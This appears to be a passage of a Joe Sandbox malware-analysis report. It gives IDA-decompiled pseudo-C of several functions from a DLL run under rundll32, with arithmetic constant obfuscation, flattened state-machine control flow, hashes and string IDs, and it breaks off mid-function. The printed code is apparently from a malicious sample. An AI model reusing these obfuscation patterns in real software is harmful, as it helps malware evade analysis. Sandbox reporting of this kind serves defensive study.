                                                                        				 *(_t466 + 0x3c) =  *(_t466 + 0x3c) ^ 0x50645aeb;
                                                                        				 *(_t466 + 0x3c) =  *(_t466 + 0x3c) << 4;
                                                                        				 *(_t466 + 0x3c) =  *(_t466 + 0x3c) >> 0xe;
                                                                        				 *(_t466 + 0x3c) =  *(_t466 + 0x3c) ^ 0x000050c9;
                                                                        				 *(_t466 + 0x34) = 0x9196;
                                                                        				 *(_t466 + 0x34) =  *(_t466 + 0x34) >> 9;
                                                                        				 *(_t466 + 0x34) =  *(_t466 + 0x34) >> 5;
                                                                        				 *(_t466 + 0x34) =  *(_t466 + 0x34) << 5;
                                                                        				 *(_t466 + 0x34) =  *(_t466 + 0x34) ^ 0x00007a23;
                                                                        				 *(_t466 + 0x24) = 0x47d0;
                                                                        				 *(_t466 + 0x24) =  *(_t466 + 0x24) | 0x92809c60;
                                                                        				 *(_t466 + 0x24) =  *(_t466 + 0x24) ^ 0x0aa14077;
                                                                        				 *(_t466 + 0x24) =  *(_t466 + 0x24) >> 9;
                                                                        				 *(_t466 + 0x24) =  *(_t466 + 0x24) ^ 0x004c1604;
                                                                        				 *(_t466 + 0x54) = 0xa739;
                                                                        				 *(_t466 + 0x54) =  *(_t466 + 0x54) ^ 0xf1b351c6;
                                                                        				 *(_t466 + 0x54) =  *(_t466 + 0x54) ^ 0xf1b3adaf;
                                                                        				 *(_t466 + 0x6c) = 0x41b6;
                                                                        				 *(_t466 + 0x6c) =  *(_t466 + 0x6c) + 0x2b93;
                                                                        				 *(_t466 + 0x6c) =  *(_t466 + 0x6c) >> 6;
                                                                        				 *(_t466 + 0x6c) =  *(_t466 + 0x6c) ^ 0x000038f9;
                                                                        				 *(_t466 + 0x94) = 0xf0c0;
                                                                        				 *(_t466 + 0x94) =  *(_t466 + 0x94) * 0x45;
                                                                        				 *(_t466 + 0x94) =  *(_t466 + 0x94) ^ 0x0040ff8e;
                                                                        				 *(_t466 + 0x8c) = 0x53d0;
                                                                        				 *(_t466 + 0x8c) =  *(_t466 + 0x8c) | 0x714ab1e7;
                                                                        				 *(_t466 + 0x8c) =  *(_t466 + 0x8c) ^ 0x714af8de;
                                                                        				 *(_t466 + 0x28) = 0xe7ca;
                                                                        				 *(_t466 + 0x28) =  *(_t466 + 0x28) | 0x74901d91;
                                                                        				 *(_t466 + 0x28) =  *(_t466 + 0x28) >> 2;
                                                                        				 *(_t466 + 0x28) =  *(_t466 + 0x28) << 2;
                                                                        				 *(_t466 + 0x28) =  *(_t466 + 0x28) ^ 0x7490bdaa;
                                                                        				 *(_t466 + 0x84) = 0x4172;
                                                                        				 *(_t466 + 0x84) =  *(_t466 + 0x84) * 0x69;
                                                                        				 *(_t466 + 0x84) =  *(_t466 + 0x84) ^ 0x001ac2d4;
                                                                        				 *(_t466 + 0x78) = 0xc4a2;
                                                                        				 *(_t466 + 0x78) =  *(_t466 + 0x78) | 0xb1071ce6;
                                                                        				 *(_t466 + 0x78) =  *(_t466 + 0x78) ^ 0xb107e3cc;
                                                                        				 *(_t466 + 0x98) = 0xafb5;
                                                                        				 *(_t466 + 0x98) =  *(_t466 + 0x98) >> 5;
                                                                        				 *(_t466 + 0x98) =  *(_t466 + 0x98) ^ 0x000050c6;
                                                                        				 *(_t466 + 0x48) = 0x5e6d;
                                                                        				 *(_t466 + 0x48) =  *(_t466 + 0x48) + 0xffff30ef;
                                                                        				 *(_t466 + 0x48) =  *(_t466 + 0x48) << 6;
                                                                        				 *(_t466 + 0x48) =  *(_t466 + 0x48) ^ 0xffe3f79c;
                                                                        				 *(_t466 + 0xa4) = 0xfcdb;
                                                                        				 *(_t466 + 0xa4) =  *(_t466 + 0xa4) << 0xd;
                                                                        				 *(_t466 + 0xa4) =  *(_t466 + 0xa4) ^ 0x1f9b008b;
                                                                        				 *(_t466 + 0x1c) = 0x2d62;
                                                                        				 *(_t466 + 0x1c) =  *(_t466 + 0x1c) >> 7;
                                                                        				_t416 = 0x36;
                                                                        				 *(_t466 + 0x1c) =  *(_t466 + 0x1c) / _t416;
                                                                        				 *(_t466 + 0x1c) =  *(_t466 + 0x1c) + 0xffff17c7;
                                                                        				 *(_t466 + 0x1c) =  *(_t466 + 0x1c) ^ 0xffff0d36;
                                                                        				 *(_t466 + 0xa0) = 0xd9f3;
                                                                        				 *(_t466 + 0xa0) =  *(_t466 + 0xa0) + 0x7ef3;
                                                                        				 *(_t466 + 0xa0) =  *(_t466 + 0xa0) ^ 0x00014615;
                                                                        				 *(_t466 + 0x2c) = 0x45e6;
                                                                        				 *(_t466 + 0x2c) =  *(_t466 + 0x2c) | 0xb2517b85;
                                                                        				 *(_t466 + 0x2c) =  *(_t466 + 0x2c) + 0xffff8485;
                                                                        				_t417 = 0x47;
                                                                        				 *(_t466 + 0x2c) =  *(_t466 + 0x2c) / _t417;
                                                                        				 *(_t466 + 0x2c) =  *(_t466 + 0x2c) ^ 0x028281f3;
                                                                        				 *(_t466 + 0x14) = 0x40cf;
                                                                        				_t418 = 0x54;
                                                                        				 *(_t466 + 0x14) =  *(_t466 + 0x14) / _t418;
                                                                        				 *(_t466 + 0x14) =  *(_t466 + 0x14) >> 0xf;
                                                                        				 *(_t466 + 0x14) =  *(_t466 + 0x14) + 0xffffcfbb;
                                                                        				 *(_t466 + 0x14) =  *(_t466 + 0x14) ^ 0xffffd245;
                                                                        				 *(_t466 + 0x70) = 0xec9;
                                                                        				 *(_t466 + 0x70) =  *(_t466 + 0x70) | 0x66abf62f;
                                                                        				 *(_t466 + 0x70) =  *(_t466 + 0x70) >> 2;
                                                                        				 *(_t466 + 0x70) =  *(_t466 + 0x70) ^ 0x19aa8e93;
                                                                        				 *(_t466 + 0x9c) = 0xb92f;
                                                                        				 *(_t466 + 0x9c) =  *(_t466 + 0x9c) << 0xa;
                                                                        				 *(_t466 + 0x9c) =  *(_t466 + 0x9c) ^ 0x02e4dd06;
                                                                        				 *(_t466 + 0x40) = 0xf9b7;
                                                                        				 *(_t466 + 0x40) =  *(_t466 + 0x40) ^ 0xd32ba56e;
                                                                        				 *(_t466 + 0x40) =  *(_t466 + 0x40) + 0xffff6d4c;
                                                                        				_t409 =  *(_t466 + 0xb0);
                                                                        				 *(_t466 + 0x40) =  *(_t466 + 0x40) / _t408;
                                                                        				 *(_t466 + 0x40) =  *(_t466 + 0x40) ^ 0x01bea26b;
                                                                        				 *(_t466 + 0x68) = 0x7664;
                                                                        				 *(_t466 + 0x68) =  *(_t466 + 0x68) >> 0xc;
                                                                        				 *(_t466 + 0x68) =  *(_t466 + 0x68) + 0xffff8a59;
                                                                        				 *(_t466 + 0x68) =  *(_t466 + 0x68) ^ 0xffff9898;
                                                                        				do {
                                                                        					while(_t460 != 0x4166320) {
                                                                        						if(_t460 == 0x5d953cf) {
                                                                        							E10018668( *(_t466 + 0x68),  *(_t466 + 0x40), __eflags,  *(_t466 + 0x48), _t466 + 0x2c8);
                                                                        							_t460 = 0x2c6b1ef9;
                                                                        							continue;
                                                                        						} else {
                                                                        							if(_t460 == 0xe980b9f) {
                                                                        								_t460 = 0x273bc967;
                                                                        								continue;
                                                                        							} else {
                                                                        								if(_t460 == 0x1c525ebd) {
                                                                        									_t409 = E1000492A( *(_t466 + 0x60), 0,  *((intOrPtr*)(_t466 + 0xc0)),  *((intOrPtr*)(_t466 + 0xb4)),  *(_t466 + 0x4c),  *(_t466 + 0x60),  *(_t466 + 0x6c),  *(_t466 + 0x9c),  *(_t466 + 0x60),  *((intOrPtr*)(_t466 + 0x4e8)),  *(_t466 + 0x88),  *((intOrPtr*)(_t466 + 0x80)),  *(_t466 + 0x9c),  *(_t466 + 0x48));
                                                                        									_t466 = _t466 + 0x30;
                                                                        									__eflags = _t395 - 0xffffffff;
                                                                        									if(__eflags != 0) {
                                                                        										_t460 = 0x35123284;
                                                                        										continue;
                                                                        									}
                                                                        								} else {
                                                                        									if(_t460 == 0x273bc967) {
                                                                        										E10008C0C( *(_t466 + 0x70), __eflags,  *(_t466 + 0x18),  *(_t466 + 0x94), _t466 + 0xc0);
                                                                        										_t400 = E10001E13( *(_t466 + 0x38),  *(_t466 + 0x30),  *(_t466 + 0x70),  *((intOrPtr*)(_t466 + 0xb8)), _t466 + 0xcc);
                                                                        										_t466 = _t466 + 0x18;
                                                                        										_t460 = 0x5d953cf;
                                                                        										 *_t400 = 0;
                                                                        										continue;
                                                                        									} else {
                                                                        										if(_t460 == 0x2c6b1ef9) {
                                                                        											_push( *((intOrPtr*)(_t466 + 0x4d4)));
                                                                        											_push( *(_t466 + 0x84));
                                                                        											E100164EC( *((intOrPtr*)(_t466 + 0xbc)), __eflags, E1001BF25( *(_t466 + 0x7c),  *(_t466 + 0x60), __eflags),  *((intOrPtr*)(_t466 + 0xcc)), 0x104, _t466 + 0x2e0, _t466 + 0xd0,  *(_t466 + 0x5c),  *(_t466 + 0x94),  *(_t466 + 0x44));
                                                                        											E1001C5F7( *(_t466 + 0x68),  *(_t466 + 0x58),  *(_t466 + 0x84),  *(_t466 + 0x98), _t401);
                                                                        											_t466 = _t466 + 0x34;
                                                                        											_t460 = 0x1c525ebd;
                                                                        											continue;
                                                                        										} else {
                                                                        											if(_t460 != 0x35123284) {
                                                                        												goto L16;
                                                                        											} else {
                                                                        												E10001F8B( *((intOrPtr*)(_t464 + 4)),  *((intOrPtr*)(_t466 + 0xc4)),  *(_t466 + 0x38),  *((intOrPtr*)(_t466 + 0xb8)), _t464 + 4,  *(_t466 + 0x3c),  *((intOrPtr*)(_t466 + 0x20)), _t409, _t464 + 4,  *_t464);
                                                                        												_t466 = _t466 + 0x20;
                                                                        												_t460 = 0x4166320;
                                                                        												_t457 =  !=  ? 1 : _t457;
                                                                        												continue;
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						goto L17;
                                                                        					}
                                                                        					E100078F0(_t409,  *(_t466 + 0x7c),  *(_t466 + 0xa4),  *(_t466 + 0x44),  *(_t466 + 0x68));
                                                                        					_t466 = _t466 + 0xc;
                                                                        					_t460 = 0x2a923978;
                                                                        					L16:
                                                                        					__eflags = _t460 - 0x2a923978;
                                                                        				} while (__eflags != 0);
                                                                        				L17:
                                                                        				return _t457;
                                                                        			}
















                                                                        0x10002a75
                                                                        0x10002a80
                                                                        0x10002a88
                                                                        0x10002a93
                                                                        0x10002a9b
                                                                        0x10002aa6
                                                                        0x10002aab
                                                                        0x10002aaf
                                                                        0x10002ab7
                                                                        0x10002abf
                                                                        0x10002aca
                                                                        0x10002ad5
                                                                        0x10002ae0
                                                                        0x10002ae8
                                                                        0x10002af0
                                                                        0x10002afe
                                                                        0x10002b03
                                                                        0x10002b07
                                                                        0x10002b0f
                                                                        0x10002b1d
                                                                        0x10002b22
                                                                        0x10002b26
                                                                        0x10002b2b
                                                                        0x10002b33
                                                                        0x10002b3b
                                                                        0x10002b43
                                                                        0x10002b4b
                                                                        0x10002b50
                                                                        0x10002b58
                                                                        0x10002b63
                                                                        0x10002b6b
                                                                        0x10002b76
                                                                        0x10002b7e
                                                                        0x10002b86
                                                                        0x10002b94
                                                                        0x10002b9b
                                                                        0x10002b9f
                                                                        0x10002ba7
                                                                        0x10002baf
                                                                        0x10002bb4
                                                                        0x10002bbc
                                                                        0x10002bc4
                                                                        0x10002bc4
                                                                        0x10002bd6
                                                                        0x10002da2
                                                                        0x10002da9
                                                                        0x00000000
                                                                        0x10002bdc
                                                                        0x10002be2
                                                                        0x10002d84
                                                                        0x00000000
                                                                        0x10002be8
                                                                        0x10002bee
                                                                        0x10002d70
                                                                        0x10002d72
                                                                        0x10002d75
                                                                        0x10002d78
                                                                        0x10002d7a
                                                                        0x00000000
                                                                        0x10002d7a
                                                                        0x10002bf4
                                                                        0x10002bfa
                                                                        0x10002cef
                                                                        0x10002d0f
                                                                        0x10002d14
                                                                        0x10002d17
                                                                        0x10002d1e
                                                                        0x00000000
                                                                        0x10002c00
                                                                        0x10002c06
                                                                        0x10002c53
                                                                        0x10002c5a
                                                                        0x10002caa
                                                                        0x10002cc6
                                                                        0x10002ccb
                                                                        0x10002cce
                                                                        0x00000000
                                                                        0x10002c08
                                                                        0x10002c0e
                                                                        0x00000000
                                                                        0x10002c14
                                                                        0x10002c39
                                                                        0x10002c40
                                                                        0x10002c44
                                                                        0x10002c4b
                                                                        0x00000000
                                                                        0x10002c4b
                                                                        0x10002c0e
                                                                        0x10002c06
                                                                        0x10002bfa
                                                                        0x10002bee
                                                                        0x10002be2
                                                                        0x00000000
                                                                        0x10002bd6
                                                                        0x10002dc8
                                                                        0x10002dcd
                                                                        0x10002dd0
                                                                        0x10002dd5
                                                                        0x10002dd5
                                                                        0x10002dd5
                                                                        0x10002de1
                                                                        0x10002ded

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: #z$(9$5H$b-$dv$f_$j$l7$m^$rA$z)$E$ZdP
                                                                        • API String ID: 0-500794611
                                                                        • Opcode ID: 6c22406395d75c115b4026df920d1e405d61ac760d96bcec021409155602d6bf
                                                                        • Instruction ID: 2f189fb40b88e7232357bad84871cb140e457652571658457e73c86c02e6a5c1
                                                                        • Opcode Fuzzy Hash: 6c22406395d75c115b4026df920d1e405d61ac760d96bcec021409155602d6bf
                                                                        • Instruction Fuzzy Hash: 7D021F715093819FE368CF21C98AA4FBBE1BBC4748F10891DE2D9962A0D7B58949CF43
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 98%
                                                                        			E10009CC8() {
                                                                        				char _v520;
                                                                        				intOrPtr _v524;
                                                                        				intOrPtr _v528;
                                                                        				intOrPtr _v532;
                                                                        				signed int _v536;
                                                                        				signed int _v540;
                                                                        				signed int _v544;
                                                                        				signed int _v548;
                                                                        				signed int _v552;
                                                                        				signed int _v556;
                                                                        				signed int _v560;
                                                                        				signed int _v564;
                                                                        				signed int _v568;
                                                                        				signed int _v572;
                                                                        				signed int _v576;
                                                                        				signed int _v580;
                                                                        				signed int _v584;
                                                                        				signed int _v588;
                                                                        				signed int _v592;
                                                                        				signed int _v596;
                                                                        				signed int _v600;
                                                                        				signed int _v604;
                                                                        				signed int _v608;
                                                                        				signed int _v612;
                                                                        				intOrPtr _t232;
                                                                        				void* _t233;
                                                                        				intOrPtr _t236;
                                                                        				void* _t246;
                                                                        				signed int _t270;
                                                                        				signed int _t271;
                                                                        				signed int _t272;
                                                                        				signed int _t273;
                                                                        				signed int _t274;
                                                                        				signed int _t275;
                                                                        				signed int _t276;
                                                                        				intOrPtr _t277;
                                                                        				signed int* _t279;
                                                                        				void* _t282;
                                                                        
                                                                        				_t279 =  &_v612;
                                                                        				_v532 = 0x572357;
                                                                        				_v528 = 0x2f5978;
                                                                        				_t270 = 0xf;
                                                                        				_t277 = 0;
                                                                        				_v524 = 0;
                                                                        				_t246 = 0x31c11544;
                                                                        				_v612 = 0x129f;
                                                                        				_v612 = _v612 / _t270;
                                                                        				_v612 = _v612 ^ 0xf442200a;
                                                                        				_v612 = _v612 + 0x8904;
                                                                        				_v612 = _v612 ^ 0xf442aa27;
                                                                        				_v608 = 0x5b59;
                                                                        				_t271 = 7;
                                                                        				_v608 = _v608 / _t271;
                                                                        				_v608 = _v608 ^ 0x00000d25;
                                                                        				_v596 = 0x2567;
                                                                        				_v596 = _v596 ^ 0xfa26aa3d;
                                                                        				_v596 = _v596 << 0x10;
                                                                        				_t272 = 0x51;
                                                                        				_v596 = _v596 / _t272;
                                                                        				_v596 = _v596 ^ 0x01c566ae;
                                                                        				_v564 = 0x2177;
                                                                        				_v564 = _v564 ^ 0x4051fc1c;
                                                                        				_v564 = _v564 ^ 0xb5034854;
                                                                        				_v564 = _v564 ^ 0xf552b9fc;
                                                                        				_v552 = 0xa42c;
                                                                        				_v552 = _v552 + 0xffff8520;
                                                                        				_t273 = 0x36;
                                                                        				_v552 = _v552 / _t273;
                                                                        				_v552 = _v552 ^ 0x00005687;
                                                                        				_v556 = 0x4d63;
                                                                        				_v556 = _v556 ^ 0x23f659e6;
                                                                        				_v556 = _v556 << 4;
                                                                        				_v556 = _v556 ^ 0x3f617f89;
                                                                        				_v548 = 0xc92c;
                                                                        				_t274 = 0x1f;
                                                                        				_v548 = _v548 / _t274;
                                                                        				_v548 = _v548 | 0xd485f233;
                                                                        				_v548 = _v548 ^ 0xd4858bcc;
                                                                        				_v608 = 0x4780;
                                                                        				_v608 = _v608 + 0xffff036b;
                                                                        				_v608 = _v608 ^ 0xffff7b62;
                                                                        				_v592 = 0xf0a1;
                                                                        				_v592 = _v592 ^ 0x3b3a717c;
                                                                        				_v592 = _v592 ^ 0x4319cb35;
                                                                        				_v592 = _v592 + 0x4f8d;
                                                                        				_v592 = _v592 ^ 0x78239a46;
                                                                        				_v588 = 0x33cb;
                                                                        				_v588 = _v588 * 0x50;
                                                                        				_v588 = _v588 | 0x5a8f737f;
                                                                        				_v588 = _v588 ^ 0x5a9f48d0;
                                                                        				_v536 = 0x13fd;
                                                                        				_v536 = _v536 * 5;
                                                                        				_v536 = _v536 ^ 0x00004fad;
                                                                        				_v600 = 0x5083;
                                                                        				_v600 = _v600 ^ 0xb24ff3ec;
                                                                        				_v600 = _v600 + 0xffff65b9;
                                                                        				_t275 = 0x35;
                                                                        				_v600 = _v600 * 0x36;
                                                                        				_v600 = _v600 ^ 0x9cabf209;
                                                                        				_v572 = 0x63e6;
                                                                        				_v572 = _v572 << 3;
                                                                        				_v572 = _v572 + 0x6ca3;
                                                                        				_v572 = _v572 ^ 0x0003addb;
                                                                        				_v540 = 0x1289;
                                                                        				_v540 = _v540 >> 1;
                                                                        				_v540 = _v540 ^ 0x00003929;
                                                                        				_v544 = 0x5834;
                                                                        				_v544 = _v544 ^ 0x9eb824c8;
                                                                        				_v544 = _v544 ^ 0x9eb8689b;
                                                                        				_v584 = 0x7c37;
                                                                        				_v584 = _v584 * 0x74;
                                                                        				_v584 = _v584 ^ 0x66bbdc02;
                                                                        				_v584 = _v584 ^ 0x6683aa43;
                                                                        				_v568 = 0x4cc0;
                                                                        				_v568 = _v568 | 0x439ba37f;
                                                                        				_v568 = _v568 + 0xffffbc9e;
                                                                        				_v568 = _v568 ^ 0x439bbd6b;
                                                                        				_v560 = 0x409b;
                                                                        				_v560 = _v560 + 0x5a42;
                                                                        				_v560 = _v560 + 0xabe3;
                                                                        				_v560 = _v560 ^ 0x000101e3;
                                                                        				_v612 = 0x62bf;
                                                                        				_v612 = _v612 << 9;
                                                                        				_v612 = _v612 + 0xffffd5ba;
                                                                        				_v612 = _v612 ^ 0xe652b9b2;
                                                                        				_v612 = _v612 ^ 0xe697c132;
                                                                        				_v576 = 0x7077;
                                                                        				_t276 = _v608;
                                                                        				_v576 = _v576 / _t275;
                                                                        				_v576 = _v576 * 5;
                                                                        				_v576 = _v576 ^ 0x00006027;
                                                                        				_v580 = 0x9a4a;
                                                                        				_v580 = _v580 + 0x4b3e;
                                                                        				_v580 = _v580 << 0xe;
                                                                        				_v580 = _v580 ^ 0x396d003f;
                                                                        				goto L1;
                                                                        				do {
                                                                        					while(1) {
                                                                        						L1:
                                                                        						_t282 = _t246 - 0x31c11544;
                                                                        						if(_t282 > 0) {
                                                                        							break;
                                                                        						}
                                                                        						if(_t282 == 0) {
                                                                        							_push(_t246);
                                                                        							_t236 = E100157E8(0x440);
                                                                        							 *0x100221b0 = _t236;
                                                                        							__eflags = _t236;
                                                                        							if(__eflags == 0) {
                                                                        								L23:
                                                                        								return _t277;
                                                                        							}
                                                                        							 *((intOrPtr*)(_t236 + 0x21c)) = E100094EC;
                                                                        							_t246 = 0x30823c81;
                                                                        							continue;
                                                                        						}
                                                                        						if(_t246 == 0x687b4fe) {
                                                                        							_v604 = 0xf298;
                                                                        							_t246 = 0x37d3e938;
                                                                        							_v604 = _v604 + 0xbb6f;
                                                                        							_v604 = _v604 ^ 0x0001ae2e;
                                                                        							continue;
                                                                        						}
                                                                        						if(_t246 == 0x8847984) {
                                                                        							E10008C0C(_v584, __eflags, _v568, _v560,  &_v520);
                                                                        							 *((intOrPtr*)( *0x100221b0 + 0xc)) = E1001C424( &_v520, _v576);
                                                                        							goto L23;
                                                                        						}
                                                                        						if(_t246 == 0x2aee8ed5) {
                                                                        							_v604 = 0xdb1c;
                                                                        							_t246 = 0x3b385d06;
                                                                        							_v604 = _v604 | 0xf22f27d0;
                                                                        							_v604 = _v604 ^ 0xf22fffc0;
                                                                        							 *((intOrPtr*)( *0x100221b0 + 0x220)) = E10017A42;
                                                                        							continue;
                                                                        						}
                                                                        						if(_t246 != 0x30823c81) {
                                                                        							goto L20;
                                                                        						}
                                                                        						_t276 = E1000DA66(_v580, _t267, _v552, _t246, _v556);
                                                                        						_t279 =  &(_t279[3]);
                                                                        						if(_t276 == 0) {
                                                                        							_t246 = 0x2aee8ed5;
                                                                        						} else {
                                                                        							 *((intOrPtr*)( *0x100221b0 + 0x22c)) = 1;
                                                                        							_t246 = 0x687b4fe;
                                                                        						}
                                                                        					}
                                                                        					__eflags = _t246 - 0x37d3e938;
                                                                        					if(_t246 == 0x37d3e938) {
                                                                        						_t267 = _t276;
                                                                        						E1001F23C(_v548, _t276, _v608, _v592, _v588);
                                                                        						_t279 =  &(_t279[3]);
                                                                        						_t246 = 0x3b385d06;
                                                                        						goto L20;
                                                                        					}
                                                                        					__eflags = _t246 - 0x3b385d06;
                                                                        					if(_t246 == 0x3b385d06) {
                                                                        						_push(_t246);
                                                                        						_t198 =  &_v600; // 0x6027
                                                                        						_t267 = _v536;
                                                                        						_t232 = E10001D54(_v536, _t246,  *_t198, _v572, _v540,  *0x100221b0 + 0x234, _v544, _v604);
                                                                        						_t279 =  &(_t279[8]);
                                                                        						_t246 = 0x3b59d612;
                                                                        						__eflags = _t232;
                                                                        						_t233 = 1;
                                                                        						_t277 =  ==  ? _t233 : _t277;
                                                                        						goto L1;
                                                                        					}
                                                                        					__eflags = _t246 - 0x3b59d612;
                                                                        					if(_t246 != 0x3b59d612) {
                                                                        						goto L20;
                                                                        					}
                                                                        					E10007605();
                                                                        					_t246 = 0x8847984;
                                                                        					goto L1;
                                                                        					L20:
                                                                        					__eflags = _t246 - 0x393fa17b;
                                                                        				} while (__eflags != 0);
                                                                        				goto L23;
                                                                        			}

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: %$'`?$)9$4X$7|$>K$?$BZ$W#W$cM$xY/$|q:;$c
                                                                        • API String ID: 0-1474617872
                                                                        • Opcode ID: c55b65cf264b45a8f1d4d1e29e0531854e93195efa71f3acd17f3e7a948af3bd
                                                                        • Instruction ID: ba7fc6154232bfd8db280ed454fca39f84720541494348eac49d9c349cc68150
                                                                        • Opcode Fuzzy Hash: c55b65cf264b45a8f1d4d1e29e0531854e93195efa71f3acd17f3e7a948af3bd
                                                                        • Instruction Fuzzy Hash: C8B121B15093819FE358CF65C58981BFBE1FBC5788F104A1DF596862A0C3B98A49CF87
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E100106C2(intOrPtr* __ecx, void* __edx, char _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                        				char _v1;
                                                                        				char _v96;
                                                                        				char _v108;
                                                                        				intOrPtr _v112;
                                                                        				intOrPtr _v116;
                                                                        				intOrPtr _v120;
                                                                        				char _v124;
                                                                        				char _v128;
                                                                        				char _v132;
                                                                        				char _v136;
                                                                        				signed int _v140;
                                                                        				signed int _v144;
                                                                        				signed int _v148;
                                                                        				signed int _v152;
                                                                        				signed int _v156;
                                                                        				signed int _v160;
                                                                        				intOrPtr _v164;
                                                                        				signed int _v168;
                                                                        				signed int _v172;
                                                                        				signed int _v176;
                                                                        				signed int _v180;
                                                                        				signed int _v184;
                                                                        				signed int _v188;
                                                                        				signed int _v192;
                                                                        				signed int _v196;
                                                                        				signed int _v200;
                                                                        				signed int _v204;
                                                                        				signed int _v208;
                                                                        				signed int _v212;
                                                                        				signed int _v216;
                                                                        				signed int _v220;
                                                                        				signed int _v224;
                                                                        				signed int _v228;
                                                                        				signed int _v232;
                                                                        				signed int _v236;
                                                                        				signed int _v240;
                                                                        				signed int _v244;
                                                                        				signed int _v248;
                                                                        				signed int _v252;
                                                                        				signed int _v256;
                                                                        				signed int _v260;
                                                                        				intOrPtr _v264;
                                                                        				signed int _v268;
                                                                        				intOrPtr _v272;
                                                                        				signed int _v276;
                                                                        				signed int _v280;
                                                                        				unsigned int _v284;
                                                                        				signed int _v288;
                                                                        				void* _t345;
                                                                        				intOrPtr _t372;
                                                                        				void* _t379;
                                                                        				signed int _t383;
                                                                        				void* _t391;
                                                                        				intOrPtr* _t399;
                                                                        				char _t404;
                                                                        				intOrPtr* _t410;
                                                                        				char* _t433;
                                                                        				char* _t436;
                                                                        				signed int _t437;
                                                                        				intOrPtr* _t440;
                                                                        				signed int* _t442;
                                                                        				void* _t445;
                                                                        
                                                                        				_t399 = _a12;
                                                                        				_push(_t399);
                                                                        				_push(_a8);
                                                                        				_t440 = __ecx;
                                                                        				_push(_a4);
                                                                        				_push(__edx);
                                                                        				_push(__ecx);
                                                                        				E100056B2(_t345);
                                                                        				_v120 = 0x55e52e;
                                                                        				_v112 = 0;
                                                                        				_t442 =  &(( &_v288)[5]);
                                                                        				_v116 = 0x6a087e;
                                                                        				_v148 = 0x434e;
                                                                        				_t437 = 0x13292eb2;
                                                                        				_v148 = _v148 + 0xffff9485;
                                                                        				_v148 = _v148 ^ 0xffffd793;
                                                                        				_v156 = 0xec79;
                                                                        				_v156 = _v156 ^ 0xb43b0e66;
                                                                        				_v156 = _v156 ^ 0xb43be21d;
                                                                        				_v200 = 0xee7d;
                                                                        				_v200 = _v200 | 0x0533a7d7;
                                                                        				_v200 = _v200 + 0xfffff45a;
                                                                        				_v200 = _v200 ^ 0x05338944;
                                                                        				_v216 = 0x86ca;
                                                                        				_v216 = _v216 + 0x54b4;
                                                                        				_v216 = _v216 ^ 0xa0eca1d2;
                                                                        				_v216 = _v216 ^ 0xa0ec1e31;
                                                                        				_v232 = 0x5704;
                                                                        				_v232 = _v232 + 0x87d6;
                                                                        				_push(0x16);
                                                                        				_v164 = 0;
                                                                        				_push(7);
                                                                        				_v232 = _v232 / 0;
                                                                        				_v232 = _v232 >> 5;
                                                                        				_v232 = _v232 ^ 0x000017c2;
                                                                        				_v240 = 0x5173;
                                                                        				_v240 = _v240 * 0x25;
                                                                        				_v240 = _v240 << 0xa;
                                                                        				_v240 = _v240 / 0;
                                                                        				_v240 = _v240 ^ 0x06ba4efb;
                                                                        				_v248 = 0xc74b;
                                                                        				_v248 = _v248 * 0x7e;
                                                                        				_v248 = _v248 + 0xffff822f;
                                                                        				_v248 = _v248 * 0x4c;
                                                                        				_v248 = _v248 ^ 0x1cf92e4a;
                                                                        				_v256 = 0x686e;
                                                                        				_v256 = _v256 * 0x12;
                                                                        				_v256 = _v256 ^ 0xf8fdd26c;
                                                                        				_v256 = _v256 * 0x52;
                                                                        				_v256 = _v256 ^ 0xc03ea1b3;
                                                                        				_v244 = 0x2add;
                                                                        				_v244 = _v244 << 0xf;
                                                                        				_v244 = _v244 + 0xffffde04;
                                                                        				_v244 = _v244 << 8;
                                                                        				_v244 = _v244 ^ 0x6e5e34dd;
                                                                        				_v284 = 0xf4e0;
                                                                        				_v284 = _v284 + 0xba09;
                                                                        				_v284 = _v284 | 0xa2bb5836;
                                                                        				_v284 = _v284 >> 2;
                                                                        				_v284 = _v284 ^ 0x28aee5c9;
                                                                        				_v168 = 0x9f31;
                                                                        				_v168 = _v168 >> 6;
                                                                        				_v168 = _v168 ^ 0x000048ec;
                                                                        				_v220 = 0x7e53;
                                                                        				_v220 = _v220 << 6;
                                                                        				_v220 = _v220 * 0x50;
                                                                        				_v220 = _v220 ^ 0x09de0db5;
                                                                        				_v188 = 0x17a8;
                                                                        				_v188 = _v188 + 0x52a9;
                                                                        				_v188 = _v188 / 0;
                                                                        				_v188 = _v188 ^ 0x00004610;
                                                                        				_v196 = 0x5cc1;
                                                                        				_v196 = _v196 + 0xffff31d1;
                                                                        				_v196 = _v196 | 0xc97284eb;
                                                                        				_v196 = _v196 ^ 0xffffe02f;
                                                                        				_v172 = 0xda7e;
                                                                        				_v172 = _v172 << 0xe;
                                                                        				_v172 = _v172 ^ 0x369fe494;
                                                                        				_v144 = 0xccad;
                                                                        				_v144 = _v144 | 0x339a4d00;
                                                                        				_v144 = _v144 ^ 0x339a877a;
                                                                        				_v288 = 0xfcaa;
                                                                        				_v288 = _v288 << 2;
                                                                        				_v288 = _v288 + 0x9909;
                                                                        				_v288 = _v288 << 0xc;
                                                                        				_v288 = _v288 ^ 0x48bb2562;
                                                                        				_v152 = 0x61b7;
                                                                        				_v152 = _v152 << 0x10;
                                                                        				_v152 = _v152 ^ 0x61b70a03;
